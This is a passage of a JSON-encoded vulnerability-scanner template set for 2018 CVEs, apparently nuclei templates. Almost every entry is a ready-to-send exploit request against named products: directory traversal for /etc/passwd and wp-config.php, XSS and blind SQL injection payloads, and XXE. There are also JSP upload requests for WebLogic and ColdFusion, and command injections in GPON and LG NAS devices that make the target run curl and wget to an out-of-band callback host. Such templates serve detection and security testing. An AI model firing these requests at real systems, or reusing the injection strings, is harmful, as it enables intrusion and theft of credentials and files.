Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-19753","info":{"name":"Tarantella Enterprise <3.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19752","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/registrar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test\n","GET /assets/registrars.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13380","info":{"name":"Fortinet FortiOS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B","{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>","<script>alert(1337)</script>"],"condition":"or"},{"type":"word","part":"header","negative":true,"words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9118","info":{"name":"WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"}]}]},{"id":"CVE-2018-2894","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ws_utc/resources/setting/options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsetting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80\n","POST /ws_utc/resources/setting/keystore HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_name\"\n\n{{randstr}}\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_edit_mode\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_front\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_changed\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_filename\"; filename=\"{{randstr}}.jsp\"\nContent-Type: application/octet-stream\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n\n<%\nString cve = \"CVE-2018-2894\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  //0x03 is equal to 0x3, but we need 0x03 for our md5sum\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\n\nout.println(hashedpasswd.toString());\n%>\n------WebKitFormBoundaryuim0dyiDSPBPu31g--\n","GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["26ec00a3a03f6bfc5226fd121567bb58"]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<keyStoreItem><id>([0-9]+)</id><name>{{randstr}}"],"internal":true}]}]},{"id":"CVE-2018-9995","info":{"name":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/device.rsp?opt=user&cmd=list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uid\":","\"pwd\":","\"view\":","playback"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18809","info":{"name":"TIBCO JasperReports Library - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["metadata.jdbc.driverClassName","metadata.hibernate.dialect"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10230","info":{"name":"Zend Server <9.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","is not allowed to open debug sessions"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19136","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>&really_del=1\">YES"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5233","info":{"name":"Grav CMS <1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["/themes/grav","Grav Admin Login","data-grav-"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10562","info":{"name":"Dasan GPON Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0\n","POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-17422","info":{"name":"DotCMS < 5.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com","{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["self.location = 'http://evil.com'","location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"]}]}]},{"id":"CVE-2018-19892","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/dw/add-server.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=\n","GET /admin/dw/servers.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14912","info":{"name":"cgit < 1.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8715","info":{"name":"AppWeb - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Digest username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a class=\"logo\" href=\"https://embedthis.com/\">&nbsp;</a>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12095","info":{"name":"OEcms 3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6910","info":{"name":"DedeCMS 5.7 - Path Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/include/downmix.inc.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["downmix.inc.php","Call to undefined function helper()"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10818","info":{"name":"LG NAS Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /system/sharedir.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n","POST /en/php/usb_sync.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-15138","info":{"name":"LG-Ericsson iPECS NMS 30M - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data","{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-0127","info":{"name":"Cisco RV132W/RV134W Router - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dumpmdm.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Dump","MDM","cisco","admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16761","info":{"name":"Eventum <3.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/select_project.php?url=http://interact.sh","{{BaseURL}}/clock_status.php?current_page=http://interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-18264","info":{"name":"Kubernetes Dashboard <1.10.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs","{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"apiVersion\") && contains(body, \"objectRef\")"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10823","info":{"name":"D-Link Routers - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20985","info":{"name":"WordPress Payeezy Pay <=2.97 - Local File Inclusion","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"],"body":"x_login=../../../wp-config","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The base configuration for WordPress","define( 'DB_NAME',","define( 'DB_PASSWORD',"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7700","info":{"name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4cc32a3a81d2bb37271934a48ce4468a"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10095","info":{"name":"Dolibarr <7.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8033","info":{"name":"Apache OFBiz 16.11.04 - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file://///etc/passwd\">]><methodCall><methodName>&disclose;</methodName></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000856","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /segments/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test\n","GET /segments/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6008","info":{"name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18775","info":{"name":"Microstrategy Web 7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(/{{randstr}}/);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11227","info":{"name":"Monstra CMS <=3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=pages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=\"><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5715","info":{"name":"SugarCRM 3.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&\"/><script>alert(1)</script>=&\"><< Back</a><br><br>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000600","info":{"name":"Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-19749","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/account-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=\n","GET /assets/account-owners.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, '><script>alert(document.domain)</script></a>')"],"condition":"and"}]}]},{"id":"CVE-2018-18069","info":{"name":"WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin.php"],"body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\"><script>alert(0);</script>\n","host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(tolower(header), \"text/html\")","contains(set_cookie, \"_icl_current_admin_language\")","contains(body, \"\\\"><script>alert(0);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2018-2791","info":{"name":"Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{BaseURL}}\n","GET /cs/Satellite?destpage=\"<h1xxx\"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1\nHost: {{BaseURL}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(24)</script>","Missing translation key"],"condition":"and"}]}]},{"id":"CVE-2018-16159","info":{"name":"WordPress Gift Voucher <4.1.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=wpgv_doajax_front_template&template_id=1 and sleep(6)#\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"images\") && contains(body, \"title\")"],"condition":"and"}]}]},{"id":"CVE-2018-3760","info":{"name":"Ruby On Rails - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /assets/file:%2f%2f/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","regex":["/etc/passwd is no longer under a load path: (.*?),"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-1000130","info":{"name":"Jolokia Agent - JNDI Code Injection","severity":"high"},"requests":[{"raw":["POST /jolokia/read/getDiagnosticOptions HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.\nContent-Type: application/x-www-form-urlencoded\n\n{\n   \"type\":\"read\",\n   \"mbean\":\"java.lang:type=Memory\",\n   \"target\":{\n      \"url\":\"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\"\n   }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20462","info":{"name":"WordPress JSmol2WP <=1.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18323","info":{"name":"Centos Web Panel 0.9.8.480 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8006","info":{"name":"Apache ActiveMQ <=5.15.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(\"1\")</script>"]},{"type":"word","part":"header","words":["/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19386","info":{"name":"SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"],"matchers-condition":"and","matchers":[{"type":"word","words":["<a href=\"javascript:alert(document.domain)//"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18777","info":{"name":"Microstrategy Web 7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20011","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/category.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=\n","GET /assets/categories.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-9205","info":{"name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000129","info":{"name":"Jolokia 1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html","{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","java.lang.IllegalArgumentException","No type with name"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3810","info":{"name":"Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/options-general.php?page=smartcode"],"body":"sgcgoogleanalytic=<script>console.log(\"document.domain\")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<script>console.log(\"document.domain\")</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7490","info":{"name":"uWSGI PHP Plugin Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8727","info":{"name":"Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-15961","info":{"name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------24464570528145\n\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\nContent-Type: image/jpeg\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2018-15961\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  